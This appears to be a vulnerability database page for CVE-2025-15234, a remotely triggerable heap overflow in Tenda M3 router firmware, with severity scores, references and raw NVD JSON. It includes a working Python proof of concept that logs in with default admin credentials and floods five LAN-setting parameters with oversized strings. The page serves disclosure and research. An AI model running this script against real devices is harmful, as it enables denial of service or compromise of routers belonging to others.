CVE-2025-15234

Description

A weakness has been identified in Tenda M3 1.0.0.13(4903). Impacted is the function formSetRemoteInternetLanInfo of the file /goform/setInternetLanInfo. This manipulation of the argument portIp/portMask/portGateWay/portDns/portSecDns causes heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:m3_firmware:1.0.0.13\(4903\):*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:m3:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda M3 1.0.0.13(4903)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15234 PoC - Tenda M3 Heap Overflow
# Target: Tenda M3 1.0.0.13(4903)
# Vulnerability: Heap-based buffer overflow in /goform/setInternetLanInfo

TARGET_IP = "192.168.0.1"
TARGET_PORT = 80
LOGIN_URL = f"http://{TARGET_IP}:{TARGET_PORT}/login"
EXPLOIT_URL = f"http://{TARGET_IP}:{TARGET_PORT}/goform/setInternetLanInfo"

def login():
    """Login to Tenda M3 router with default credentials"""
    session = requests.Session()
    login_data = {
        "username": "admin",
        "password": "admin"
    }
    try:
        response = session.post(LOGIN_URL, data=login_data, timeout=10)
        return session
    except requests.RequestException as e:
        print(f"Login failed: {e}")
        return None

def exploit_heap_overflow(session):
    """Trigger heap overflow by sending oversized parameters"""
    # Generate payload with oversized input to trigger heap overflow
    # The vulnerability is in formSetRemoteInternetLanInfo function
    overflow_payload = "A" * 1024
    
    exploit_data = {
        "portIp": overflow_payload,
        "portMask": overflow_payload,
        "portGateWay": overflow_payload,
        "portDns": overflow_payload,
        "portSecDns": overflow_payload
    }
    
    try:
        response = session.post(EXPLOIT_URL, data=exploit_data, timeout=10)
        print(f"Exploit sent. Status code: {response.status_code}")
        print(f"Response: {response.text[:200]}")
        return True
    except requests.RequestException as e:
        print(f"Exploit failed: {e}")
        return False

def main():
    print("=" * 60)
    print("CVE-2025-15234 PoC - Tenda M3 Heap Overflow")
    print("=" * 60)
    
    if len(sys.argv) > 1:
        global TARGET_IP
        TARGET_IP = sys.argv[1]
    
    session = login()
    if session:
        print(f"[*] Successfully logged in to {TARGET_IP}")
        exploit_heap_overflow(session)
    else:
        print("[!] Failed to authenticate")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15234
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15234
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15234/
[4] VulDB https://vuldb.com/cve/CVE-2025-15234
[5] https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteInternetLanInfo.md
[6] https://vuldb.com/?ctiid.338630
[7] https://vuldb.com/?id.338630
[8] https://vuldb.com/?submit.725496
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15234", "sourceIdentifier": "[email protected]", "published": "2025-12-30T09:15:52.597", "lastModified": "2026-02-24T07:17:05.377", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Tenda M3 1.0.0.13(4903). Impacted is the function formSetRemoteInternetLanInfo of the file /goform/setInternetLanInfo. This manipulation of the argument portIp/portMask/portGateWay/portDns/portSecDns causes heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:m3_firmware:1.0.0.13\\(4903\\):*:*:*:*:*:*:*", "matchCriteriaId": "7E8A3AB9-7717-427B-8C76-1A5BCF42C08E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:m3:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8543333-41FC-48B4-B14C-D763495A1017"}]}]}], "references": [{"url": "https://github.com/dwBruijn/CVEs/blob/main/Tenda/setRemoteInternetLanInfo.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338630", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338630", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725496", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}